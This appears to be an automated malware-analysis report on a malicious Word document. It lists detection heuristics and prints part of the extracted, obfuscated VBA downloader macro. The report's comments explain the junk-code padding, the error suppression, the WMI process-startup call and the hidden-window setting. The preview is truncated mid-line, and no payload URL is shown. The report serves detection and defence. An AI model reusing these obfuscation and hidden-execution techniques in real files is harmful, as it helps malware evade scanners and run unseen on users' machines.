Verdict: MALICIOUS (risk score 222)

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
The sample is a malicious Office document containing a VBA macro. The macro is triggered by the AutoOpen event and uses GetObject, indicating an attempt to download and execute a second-stage payload. The ClamAV heuristic also flags it as a downloader. The obfuscated nature of the VBA script prevents a more detailed analysis of its specific actions.
Heuristics (7)

- ClamAV: Doc.Downloader.00536d-6863013-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Downloader.00536d-6863013-0
- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings): Document contains VBA macro code
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- GetObject call (high, OLE_VBA_GETOBJ): GetObject call
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 55372 bytes | c4e1294e4f41184a865f2b1d5c3648985bc64dd4d68439980177fc041ce70d71 |
Preview script (first 1,000 lines of the extracted script)

```vba
Attribute VB_Name = "t686_23"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "a__4_071"

' Junk-code padding: every If compares two never-assigned variables (both Empty),
' so the condition is always False and the arithmetic never runs. Its only purpose
' is to bury the handful of meaningful statements and defeat signature matching.
Function V4_960_()
If q_546_ <> I_1_7__ Then
    Q7_9__ = 701470813 + CSng(146828637) * 13586202 * ChrB(96109000) * (E00_599 / CDbl(691025095 + CBool(A963__0 - Int(226317228 / Z1__17 * 871196382 / Cos(D506_23)))) - (H347__ + Oct(481363254) + 113011789 / 172696663))
End If
If K61__6_7 <> N993191 Then
    R__30_64 = 64692881 + CSng(578692896) * 379387962 * ChrB(634968106) * (t___5837 / CDbl(832129842 + CBool(E____30_ - Int(294701623 / Q46_63__ * 244617836 / Cos(o_44____)))) - (D39_7437 + Oct(714578314) + 649762828 / 230443330))
End If
If S7954326 <> r_7___8 Then
    V___85_ = 260390344 + CSng(973764153) * 399475724 * ChrB(739792131) * (k_54_150 / CDbl(54597051 + CBool(i6__993 - Int(237944148 / Q_982_ * 494098103 / Cos(B59218)))) - (I75_6655 + Oct(109470767) + 347894136 / 5529734))
End If
If W4__8677 <> Z582_48 Then
    j__76_ = 874020192 + CSng(496181604) * 657556750 * ChrB(15358458) * (M08681 / CDbl(626295081 + CBool(G78__3 - Int(697120642 / z__13_ * 547765031 / Cos(w0__797)))) - (B044__2 + Oct(491179086) + 485135317 / 319774700))
End If
If a6_525 <> Y97_7_72 Then
    P966_43 = 693709293 + CSng(231633702) * 153172497 * ChrB(534266532) * (D23_6717 / CDbl(805157224 + CBool(q31___ - Int(297114053 / C_402882 * 428378879 / Cos(O9_704)))) - (i9_7_2 + Oct(552420440) + 663567571 / 191300926))
End If
If H_9_6_4 <> N8_7487 Then
    l41995 = 566391186 + CSng(375360027) * 503722413 * ChrB(211428483) * (Q2_99_66 / CDbl(469166473 + CBool(I265_9_ - Int(819780431 / I0_983 * 277971919 / Cos(U16__6)))) - (f021__9_ + Oct(517300280) + 238267555 / 38156000))
End If
If J6_8_4 <> r73__3_9 Then
    s_204282 = 633682142 + CSng(722963510) * 111787245 * ChrB(108496270) * (M66_26 / CDbl(123722445 + CBool(M37181_ - Int(306821415 / t3_283 * 585360384 / Cos(f60_8_88)))) - (c8_46_ + Oct(490162109) + 803388090 / 68676712))
End If
End Function

Function j6_442_(T61_97_, V__1284_)
' Swallow every runtime error so the macro never shows a dialog to the user.
On Error Resume Next
If W80_362_ <> s_0702 Then
    Z8___99 = 326525044 + CSng(733662102) * 684163206 * ChrB(411026241) * (N440412 / CDbl(367886585 + CBool(i6180_ - Int(230675253 / m_85_0 * 762871673 / Cos(r07618)))) - (U_719_64 + Oct(323993210) + 322732401 / 727638239))
End If
If v5798_ <> W2644_3 Then
    C4689_5 = 520977429 + CSng(114936677) * 645867905 * ChrB(456511223) * (p531___5 / CDbl(357965447 + CBool(R9_63_ - Int(410945636 / j1_095 * 322543093 / Cos(W46295)))) - (I16_40 + Oct(457581538) + 333283385 / 190196315))
End If
' Live statement: the string fragments concatenate (the unassigned variables are Empty)
' to "winmgmts:Win32_ProcessStartup", the GetObject moniker flagged by OLE_VBA_GETOBJ.
Set T8_0__ = GetObject((Q54852_9 + "winmgm" + i7_3_80) + (j6206837 + "ts:Win" + T6454_) + "32_Proce" + "ssStartup")
If J_9_328 <> l79_7_99 Then
    i0_524_ = 950307736 + CSng(380891135) * 709487637 * ChrB(237835325) * (o55__9__ / CDbl(994309596 + CBool(z9_9__ - Int(774240038 / B__59787 * 184358792 / Cos(k87_921_)))) - (s05_68 + Oct(508241271) + 125297862 / 25432035))
End If
If z_8251 <> J74954 Then
    z91790_7 = 663463375 + CSng(245199932) * 291820666 * ChrB(598740922) * (w___3_ / CDbl(509389916 + CBool(l3_9_831 - Int(667974032 / G90874_1 * 478329473 / Cos(n8_86072)))) - (F_54012 + Oct(928103046) + 466661151 / 238199702))
End If
If c_2001 <> r_88_3_ Then
    S_750_7 = 451894603 + CSng(842967944) * 56687212 * ChrB(322034940) * (C_7_96 / CDbl(152221836 + CBool(A85485_ - Int(644963124 / f2_3_0__ * 670471075 / Cos(w150_92_)))) - (H4___16 + Oct(436837278) + 94617526 / 676878307))
End If
' Live statement: 95517 - 95517 = 0 (SW_HIDE), so any process created with this
' startup configuration runs without a visible window.
T8_0__.ShowWindow = 95517 - 95517
If P65985 <> d27_323_ Then
    P6_0_9 = 578324938 + CSng(587359044) * 626967944 * ChrB(715961569) * (J39_429 / CDbl(911867854 + CBool(z_9_57_ - Int(729078707 / p628398 * 750569534 / Cos(j501_546)))) - (L4__71 + Oct(83349916) + 883350524 / 300313035))
End If
If i444__ <> s6_118 Then
    v0__0_ = 963287015 + CSng(143458624) * 8106882 * ChrB(203455458) * (B_211_ / CDbl(499331418 + CBool(v74520 - Int(21034086 ... (truncated)
```